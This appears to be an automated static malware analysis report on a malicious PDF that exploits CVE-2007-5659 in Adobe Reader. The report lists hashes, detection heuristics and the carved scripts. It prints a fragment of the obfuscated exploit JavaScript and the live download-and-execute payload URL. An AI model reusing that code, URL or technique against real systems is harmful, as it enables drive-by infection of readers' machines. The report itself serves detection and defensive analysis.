Malicious PDF — malware analysis report

Static analysis result for SHA-256 7dc0e31f448d55ed…

Verdict: MALICIOUS
File type: PDF
Size: 4.6 KB
Created: 2008-08-06 01:42:27
Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12)
First seen: 2013-06-28
MD5: 753da987e8189fcdcda41cb361257e40
SHA-1: 9da563135e0d03f1633e6135fbb7de7b06b7db98
SHA-256: 7dc0e31f448d55edd23000d6c4a390897701b177719844bfca1916da4c40da92
Risk score: 308

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed to download and execute a second-stage payload from the URL http://google-moogle.net/fiesta/load.php?id=30417&spl=4. The ML classifier strongly indicates maliciousness, and the exploit cluster confirms the presence of exploit code.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (8)

  • Collab.collectEmailInfo — CVE-2007-5659 (critical; exact CVE match; rule CVE_2007_5659)
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action (low; 3 related findings; rule PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (critical; rule PDF_JS_EXPLOIT_CLUSTER)
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script:
    function GZuRuOwqunt1C4(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function hp5mDtMJ(tGHgeUqSVLKUG){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(tGHgeUqSVLKUG)"+";"+"}");eval("function xPOI4(NbdYxpqBQqN1s){var O2i9v="+"0,h6SXAprtdPi=NbdYxpqBQqN1s.l"+"en"+"gth,y7wr5lSiKQXAb=10"+"2"+"4,hzyuF,GhBAX35ARmpGtl,sXags1D4cB5b0z='',lzYyA72EHS27=O2i9v,isqtQQZIRnL4yP=O2i9v,uPWvO6=O2i9v,XBunSNoZ7k=Ar"+"ra"+"y(63,40 …
  • PDF exploit shellcode contains an embedded download URL (high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL)
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream (low; rule PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage (high; rule PDF_GENERIC_STAGE_RECOVERY)
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact (medium; rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info; rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://google-moogle.net/fiesta/load.php?id=30417&spl=4 (referenced by PDF JavaScript)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x36C | 6235 bytes
SHA-256: ebb6d73df0274234c5ef5b15ce0fa08e03cffd1a78a86dd4426f41805917a14c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 125 of 226 identifiers look randomly generated (e.g. 'uVKfYWDx_2K5j3DxuVa5jVDx_WHnW2Dx_WHM'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery (sixbit-xor-table) from JavaScript object 13 at offset 0x36C | 2564 bytes
SHA-256: 4217ef15da7b1b15436e0ce85905001761d5b63f8c823f0d588a776939e41108
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script